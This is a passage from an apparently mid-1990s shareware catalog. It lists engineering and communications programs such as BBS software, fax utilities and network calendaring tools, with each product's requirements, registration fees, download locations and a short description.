DeskJet + printer; HP LaserJet printer; Postscript printer; Epson + printer. + Registration fee: $33.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, fax, CompuServe, mail support; discounts on + upgrades. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; ANNA-BOM.ZIP on + CompuServe in CIS:ACAD forum LIBrary 10 (or contact userID + 75452,3723 for assistance). + SWREG#: 4335 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Generates bills of materials (BOM) from AutoCAD DXF files. The + system counts "Blocks" any of which may be included or excluded + in the BOM. TAGs may be inserted & edited in the descriptions. + The descriptions are fully editable as are the BOM page and + column headers. Context sensitive, on-line help is available + for most operations. The generator prints the BOM or saves it + as a delimited file. + + Chapter 9, "Engineering" 417 + + + + Product: PROP OPTIMIZER (tm) + Author: Bates Engineering/Software, 916-622-1886 + Version: 1.90 (10-27-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; royalty-free runtime + license; discounts on other products; discounts on upgrades. + Look for: PROP19.ZIP on BBSs. + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Designs propellers for experimental and commercial aircraft. A + mathematical optimizer drives design variables to determine the + best propeller diameter, pitch, blade area and number of blades + for maximum cruise speed in a single pass optimization. Primary + input is engine horsepower versus rpm and drag area input. Drag + area may be determined from a recorded aircraft performance or + estimated. Many educational and explanatory screens. Online + help is provided for easy input. + + Chapter 10, "Communications" 418 + + + + + + Chapter 10 + Communications + + + 10.1 General-purpose modem communications + + Product: BBS Communications + Author: MicroFox Company, 216-659-9489 + Version: 2.18 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Modem. + Strongly recommended: CGA monitor; Hercules monitor; Dual 720k + floppy drives; Hard disk; Hayes-compatible modem; Mouse. + Registration fee: $29.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: BBS218.ZIP on BBSs (call 216-661-9065 to download it at + no charge); BBS218.ZIP on CompuServe in CIS:PCBBS forum LIBrary + 0 (or contact userID 73057,3113 for assistance); BBS218.ZIP on + GEnie in IBMPC forum LIBrary 0. + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + A general communications program for uploading and downloading + files to/from bulletin board systems. Many protocols including + ASCII, Xmodem, Ymodem, Zmodem, and Kermit with multiple + variations. Keeps of track of last time each BBS called and + how long spent on each one. Easy to set up and use. + + + Product: COM-AND + Author: CABER Software, 310-439-6104 + Version: 2.93 (11-17-93) + Needs: IBM PC, DOS 2.0 or better. 384k RAM. Modem or serial + port. + Registration fee: $50.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 3 months of support; bonus utilities. + Look for: CA29-*.ZIP on BBSs (multiple files) (call 310-439-7714 + to download it at no charge); CA29-*.ZIP on CompuServe in + CIS:IBMCOM forum LIBrary 3 (multiple files) (or contact userID + 73147,2665 for assistance); CA29-*.ZIP on GEnie in IBMPC forum + + Chapter 10, "Communications" 419 + + + + LIBrary 6 (multiple files) (or contact userID TARTAN for + assistance). + Download size: 771k (about 57 minutes with a 2400 baud modem) + Description: + A general purpose communications program that may be used by + itself, or with several integrated accessories. Provides + standard comm program functions: dialing directories, macros, + disk log and backscreen, binary and ASCII file transfers, + scripted execution, ASCII text editor, and so on. Included are + scripts providing a file/directory management (FILEMGR), a + learning mode (LEARN), modem/modemless PC to PC file copy + (PC-2-PC) and more. + + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 83. + + Product: FAXHAVEN + HQFAX ver 2 PLUS one-touch FAX receive help. See full + description on page 439. + + Product: HQ-FAX (1-Step High Quality FAX + One-step high quality FAX. See full description on page 439. + + Product: Link + Author: Target Software, +81-3-3207-4553 + Version: 2.1 (05-01-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hayes- + compatible modem; Mouse; XMS memory; VBRUN300.DLL. + Strongly recommended: Network (LAN). + Registration fee: $20.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + Look for: LINK.ZIP on BBSs; LINK.ZIP on GEnie in 1212 forum + LIBrary 0. + SWREG#: 4204 + PsL#: 14098 + Download size: 162k (about twelve minutes with a 2400 baud modem) + Description: + Connects your communications program to your callback service. + It will automize the connect procedure and start your + communications program allowing you to swiftly connect to your + server. You can also voice dial, time your calls and keep a + record of both voice and computer time. You can also print your + records. + + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 188. + + Chapter 10, "Communications" 420 + + + + Product: VB-Dial + Multimedia phone dialer/comm package. See full description on + page 157. + + Product: wfListen + Author: Prodigy Computing + Version: 3.00 (03-28-94) + Needs: IBM AT (80286), Windows 3.1 or better. Modem. WinFax Pro + (version 2 or 3) or WinFax Lite. + Strongly recommended: Mouse. + Registration fee: $6.00 + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support; 3-month limited return policy; all ASP-wide + offers (see page 6). Lifetime free upgrading allowed. + Look for: WFLIS300.ZIP on BBSs (multiple files) (call + 909-681-6221 to download it at no charge); WFLISN.ZIP on + CompuServe in CIS:DELRINA forum LIBrary 3 (multiple files) (or + contact userID 73770,660 for assistance). + SWREG#: 2113 + Download size: 233k (about 18 minutes with a 2400 baud modem) + Description: + For fax-modem owners who use WinFax Pro from Delrina, and who + also use a DOS- or Windows-based comms program. It disables and + re-enables WinFax auto receive (AR). This is useful with comms + programs because they require you to disable AR while they are + running, and it's easy to forget to switch AR back on. Will + silently disable AR, launch your comms program, wait for it to + finish, and then re-enable AR. Optional installable languages: + French and German. + + + Product: WinNET Mail for MS Windows + Author: COMPUTER WITCHCRAFT, INC., 502-589-6800 + Version: 2.11 (03-24-94) + Needs: IBM 80386, Windows 3.1 or better. 1024k RAM; EGA monitor; + Hard disk; Modem. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $99.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; lifetime limited return policy; + bonus utilities; all ASP-wide offers (see page 6); disks of + other shareware. Lifetime free upgrading allowed. + Look for: WNMAIL??.ZIP on BBSs; WNMAIL.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 76130,1463 for + assistance). + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + A Windows MDI application that provides access to any Internet/ + Usenet UUCP service. Account setup with WinNET service is + automatic and the software is extremely easy to use with point + and click functionality and low cost 800 number access. Full + access to 6000+ news groups including Clarinet and alt groups. + Has integrated mail and article threading news reader, 14.4KB + + Chapter 10, "Communications" 421 + + + + v.42bis store forward connect, dial-up scheduler, on-line help, + integrated uuencode/decode, and user-definable folders, and + more. + + + 10.2 Service-specific programs + + Product: Link + Connects program to callback service. See full description on + page 419. + + 10.2.1 For CompuServe + + Product: CIS Billing Orgainizer + Version: 2.1 (07-28-93) + Needs: IBM AT (80286), DOS 3.0 or better. CGA monitor; Hard + disk; Modem. + Registration fee: $15.00 + Registration benefits: 3 months of support. + Look for: availability unknown on BBSs; CISBIL.ZIP on CompuServe + in CIS:IBMCOM forum LIBrary 2 (or contact userID 71116,302 for + assistance). + Download size: 46k (about four minutes with a 2400 baud modem) + Description: + Orgainize captured CompuServe billing records. This program + will accumulate captured billing for viewing and/or printing. + Maintains one cum file for each year. Current and previous + year can be operated on by program. Requires that you capture + your own billing records. The process is fully described in + the docs. (Capturing billing is a free CompuServe service.) + + + Product: COM-AND + Communications and accessories. See full description on + page 418. + + Product: Off-line CIS Catalog Viewer + Version: 1.11 (05-26-93) + Needs: IBM AT (80286), DOS 3.0 or better. 384k RAM, hard disk. + Registration fee: $15.00 + Registration benefits: 51/4" master disk(s); 3 months of support; + bonus data. + Look for: availability unknown on BBSs; CISREF.ZIP on CompuServe + in CIS:IBMCOM forum LIBrary 2 (or contact userID 71116,302 for + assistance). + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + View forum catalog library full description files after you + have downloaded one or more from CIS. It will work on any + catalog description file using the identical format as the + IBMNET forums (as of 1-1-92). Search and mark files for later + printing after all browsing is done. Does not do the download + for you. + + Chapter 10, "Communications" 422 + + + + Product: PC Chart + Charting program for stocks & commodities. See full + description on page 386. + + Product: Recon + Author: Amdox Corp. + Version: 2.50 (09-19-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor; EMS memory; XMS memory. + Registration fee: $38.00 (add $7.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe support; bonus + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: RECON.ZIP on BBSs (multiple files); RECON.ZIP on + CompuServe in CIS:TAPCIS forum LIBrary 2 (multiple files) (or + contact userID 76672,1273 for assistance). + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + CompuServe message file manager, with message/reply editor & + script generator, pulldown menus & command line mode. New + PreScan summary for files. Handles forum messages, CMail & + INTERNET. Keeps files trimed and sorted into context, Menu + SHELL organizes your navigator & add-ons. Sysop commands, + changes immediately reflected in file. Powerful file navigation + & viewing, multiple sorts, duplicate deletion, filters, search, + print, edit, delete, move or auto-age messages. Context + sensitive help. + + + 10.2.2 For GEnie + + Product: Alad_IRQ + Author: Computer Telecommunication Systems, Inc., 404-263-8623 + Version: 1.0 (12-27-93) + Needs: IBM PC, DOS 2.1 or better. 8k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, + GEnie, mail support; bonus utilities; all ASP-wide offers (see + + Chapter 10, "Communications" 423 + + + + page 6); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. + Look for: ALAIRQ10.EXE on BBSs; ALAIRQ10.EXE on GEnie in + ALADDINSUP forum LIBrary 2 (or contact userID J.JERRIM for + assistance). + Download size: 31k (about three minutes with a 2400 baud modem) + Description: + Allows the GEnie Aladdin software to use any IRQ (2-7, 9-12, 14 + or 15) supported by your serial port or modem. Creates a run- + time environment for Aladdin that uses 8k of RAM. + + + Product: PC Chart + Charting program for stocks & commodities. See full + description on page 386. + + 10.2.3 For Internet + + Product: WebForms + Author: Q&D Software Development, 201-635-1824 + Version: 1.0h (06-15-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: Modem. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, CompuServe, mail support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: WBFRM10H.ZIP on BBSs; WBFRM.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 6011 + PsL#: 14064 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + Lets you create HTML forms for posting on the World Wide Web + with no prior HTML knowledge! Consists of two modules. The + Forms Generator, lets you design the form to your + specifications and creates the HTML file automatically. Then + you just upload the form to your Web Server and wait for the + responses to roll in to your Internet mailbox. The Response + Reader decodes the messages you receive and loads them into a + table for easy viewing. Great for order-taking! + + + 10.3 Bulletin boards + + Product: COM-AND + Communications and accessories. See full description on + page 418. + + Chapter 10, "Communications" 424 + + + + Product: ES-NEWS + Network login news manager. See full description on page 428. + + Product: MegaHost + Author: ASCII Computer Enterprises + Version: 2.21 (09-02-93) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; CGA monitor; Dual + 720k floppy drives; Modem. + Strongly recommended: Hard disk; Network (LAN). + Registration fee: $49.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS support; 3-month return policy; runtime + license; bonus utilities. Lifetime free upgrading allowed. + Look for: MHST221.ZIP on BBSs (multiple files) (call 209-836-2402 + to download it at no charge); MH221.ZIP on CompuServe in + CIS:IBMBBS forum LIBrary 1 (multiple files) (or contact userID + 70370,124 for assistance); MH221.ZIP on GEnie in BBS forum + LIBrary 4 (multiple files) (or contact userID D.MANKIN for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A serious multi-user BBS designed for ease of use. Includes B- + Tree indexed databases, ringback, callback, built-in & external + file transfers, ANSI, RIP, NAPLPS, BIG, & CONDOR graphics, + dynamic or custom menus, bulletins, questionnaire, chat, doors, + multiple security levels, file area PW's, front end mailer & + echo mail door support, interrupt driven send & receive + buffers, NS16550A FIFO, 16.8 kbps modems, database sharing + under Desqview, Windows, Novell, Banyon Vines, or any SHARE + compatible network. + + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 437. + + Chapter 10, "Communications" 425 + + + + Product: PowerBBS for Windows + Author: PowerBBS Computing, 516-938-0506 + Version: 2.50 (08-09-93) + Needs: IBM AT (80286), Windows 3.1 or better. 600k RAM; CGA + monitor; Hard disk; Hayes-compatible modem. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $99.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of unlimited phone, BBS, CompuServe, mail support; + source code. 6-month free upgrading allowed. + Look for: PBBSW25.ZIP on BBSs (call 516-822-7396 to download it + at no charge); PBBS25.ZIP on CompuServe in CIS:IBMBBS forum + LIBrary 1 (or contact userID 71155,2035 for assistance). + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + Lets you run a multi-node BBS in the background! Easy to + understand GUI manual. Supports ASCII/ANSI/RIP graphics + screens. QWK-MAIL support included; QWK-NETWORKING; FIDO + Networking GUI config, includes an advanced GUI file editing + program. Upload testing, file viewing, ratio testing, visual + editor CD-ROM support, X;Y;Zmodem/ HS-LINK, up to 1000 forums, + run DOS doors in the background, PowerLang script language, + create your own menus! + + + Product: x-FORUM3 + Network message forum system. See full description on + page 432. + + Product: x-FORUM4 + Network message forum system for Windows. See full description + on page 433. + + Product: x-NEWS3 + Network news login system. See full description on page 438. + + 10.3.1 Bulletin board utilities + + Product: BBS Communications + BBS communications for uploading/downloading. See full + description on page 418. + + Product: Medieval War Door + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0 (02-21-95) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; CGA monitor; Hard + disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, BBS, CompuServe, mail support; all ASP-wide offers (see + + Chapter 10, "Communications" 426 + + + + page 6); discounts on other products; discounts on upgrades. + Lifetime free upgrading allowed. + Look for: MEDOOR10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); MEDOO*.ZIP on CompuServe in CIS:PCBBS forum + LIBrary 4 (or contact userID 71532,3271 for assistance). + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + A BBS door game of medieval war/strategy. From 2-6 players + compete on a map of up to 100 x 100 and up to 50 games may be + played simultaneously. Almost any BBS may be configured to play + it including PCBoard and Wildcat! + + + 10.4 Networks + + See also: Utilities, Menu systems & file managers. + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 123. + + Product: COMpanion + Author: Oxford House Software + Version: 1.2 (08-01-94) + Needs: IBM PC, DOS 2.0 or better. 12k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $50.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $14.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited CompuServe, mail support; + discounts on upgrades. 2 EBD connectors, COM Finder, 50' + cable, inline coupler, flipping cable. + Look for: COMP12.ZIP on BBSs (call 415-323-4398 to download it at + no charge); COMP12.ZIP on CompuServe in CIS:IBMCOM forum + LIBrary 11 (or contact userID 72603,3215 for assistance). + SWREG#: 3861 + Download size: 96k (about seven minutes with a 2400 baud modem) + Description: + Access disks and printers on another PC using a remote drive + letter and LPT3. Average transfer rate 14K bytes/sec. using EBD + connectors (7K using standard null modem). Disk device driver + on client PC uses 12 Kbytes, server 30K. Use DESQview(tm) and + Stacker(r) to network 3 to 5 PCs (DOS 3.2+). Dynamic mapping of + 1 to 4 drive letters. Drives and printers accessible from + Windows(tm). Does not use interrupts, so will not conflict with + other serial devices. + + Chapter 10, "Communications" 427 + + + + Product: ES-NEWS + Author: Extensions Software Corporation, 407-344-3322 + Version: 2.29 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; CGA monitor; Hard + disk. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; ESNEWS.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4279 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Provides for login new and bulletin display per predefined + news/user groups. Includes built-in administration of news + text, display options, and user groups. Network-aware of both + Banyan VINES(R) and Novell NetWare(R). + + + Product: NETWORK QUOTABLES + Author: Greg Bixby, 313-737-9406 + Version: 2.01a (02-15-93) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $75.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited BBS support; bonus data. + Look for: NTQT20.ZIP on BBSs (call 313-737-2912 to download it at + no charge); NTQT20.ZIP on CompuServe in CIS:NOVUSER forum + LIBrary 8 (or contact userID 71674,731 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + Be greeted with famous, witty and thought-provoking daily + quotes on standalone or network PCs. Make your network + interesting and fun. The same quote can be displayed for all + network users on a particular day. Can be run as a non-TSR + screen saver with optional user message. An optional network + administrators message can be displayed below the quote. Add, + edit, delete, print or search quotes. + + Chapter 10, "Communications" 428 + + + + Product: Power Edit + Author: Target Software, +81-3-3207-4553 + Version: 2.02 (06-15-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Network + (LAN); XMS memory; VBRUN300.DLL. + Strongly recommended: Mouse; sound card. + Registration fee: $35.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 6 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + Look for: POWREDIT.ZIP on BBSs; POWREDIT.ZIP on GEnie in 1213 + forum LIBrary 0. + SWREG#: 5674 + PsL#: 14096 + Download size: 331k (about 25 minutes with a 2400 baud modem) + Description: + A powerful network tool allowing spellchecking, file + encryption, sending and viewing Email and advanced editing + options. Plus full control of desktop including fonts, sounds + and colors. Opens numerous file types and gives user control + over his network Email. Customizable toolbar with ruler and + multiple statusbars. + + + Product: Search-N-Store + Fast network or standalone database. See full description on + page 279. + + Product: x-CAL3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 3.31 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XCAL3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1110 + PsL#: 10884 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Features private, alternate, and workgroup calendaring with + meeting scheduler, online help, TSR option, and x-CAL3 + administration. Easy-to-use and network-aware of both Banyan + VINES(R) and Novell NetWare(R). + + Chapter 10, "Communications" 429 + + + + Product: x-CON3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.44 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime phone, fax, CompuServe, newsletter, mail support; LAN + license; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XCON3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1123 + PsL#: 10885 + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Features up to 99 different contact groups (including private), + user security per group, configurable prompts, TSR mode, online + help, and x-CON3 administration. Easy-to-use and network-aware + of both Banyan VINES(R) and Novell NetWare(R). + + + Product: x-FILE3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.74 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFILE3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1124 + PsL#: 10886 + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Allows controlled access to public files with selectable + upload/download access, filtered listings, TSR mode, online + help, and x-FILE3 administration. Easy-to-use and network-aware + of both Banyan VINES(R) and Novell NetWare(R). + + Chapter 10, "Communications" 430 + + + + Product: x-FONE3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 2.18 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFONE3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1111 + PsL#: 10887 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Features custom-defined prompts, display sorts, TSR mode, + online help, built-in security levels, and x-FONE3 + administration. Easy-to-use and network-aware of both Banyan + VINES(R) and Novell NetWare(R). + + + Product: x-FONE4 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.25 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XFONE4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4280 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Features custom-defined prompts, display sorts, online help, + multi-level security, display update, import options, and + built-in x-FONE4 administration. Low-cost, easy-to-use, and + simple-to-manage. Network-aware of both Novell NetWare(R) and + Banyan VINES(R). + + Chapter 10, "Communications" 431 + + + + Product: x-FORUM3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.28 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFORUM.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1311 + PsL#: 10942 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A workgroup conferencing system offering up to 26 message + forums, interactive or read-only forum types, message create/ + read/reply, new message indicators, TSR mode, online help, and + x-FORUM3 administration. Easy-to-use and network-aware of + Banyan VINES(R) and Novell NetWare(R). + + + Product: x-FORUM4 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.12 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XFORUM4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 5494 + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + BBS-like system for networks features 99 different message + forums with unlimited messages per forum, user access per + forum, user manage access per forum, message read/create/reply, + text import/export, clipboard cut/paste, online help, multi- + level security, and built-in x-FORUM4 administration. Low-cost, + easy-to-use, and simple-to-manage. Network-aware of both Novell + NetWare(R) and Banyan VINES(R). + + Chapter 10, "Communications" 432 + + + + Product: x-OUT3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.44 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XOUT3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1126 + PsL#: 10889 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Allows dynamic tracking of office in/out status of users with + default comment/contact information, alternate access, refresh + options, online help, and x-OUT3 administration. Easy-to-use + and network-aware of both Banyan VINES(R) and Novell + NetWare(R). + + + Product: x-OUT4 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.31 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XOUT4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4281 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Features in, out, and in-but-unavailable status, login versus + display names, alternate user access, color-status icons when + minimized, display sorts, online help, multi-level security, + display update, import options, and built-in x-OUT4 + administration. Low-cost, easy-to-use, and simple-to-manage. + Network-aware of both Novell NetWare(R) and Banyan VINES(R). + + Chapter 10, "Communications" 433 + + + + Product: x-SKED3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.58 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XSKED3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1127 + PsL#: 10890 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Features custom-defined room and resource definition prompts, + summary/detail/weekly calendars, event scheduler, TSR mode, + online help, and x-SKED3 administration. Easy-to-use and + network-aware of both Banyan VINES(R) and Novell NetWare(R). + + + 10.4.1 Modem-based networks + + See also: Communications, Remote computer access. + + Product: Link + Connects program to callback service. See full description on + page 419. + + Product: 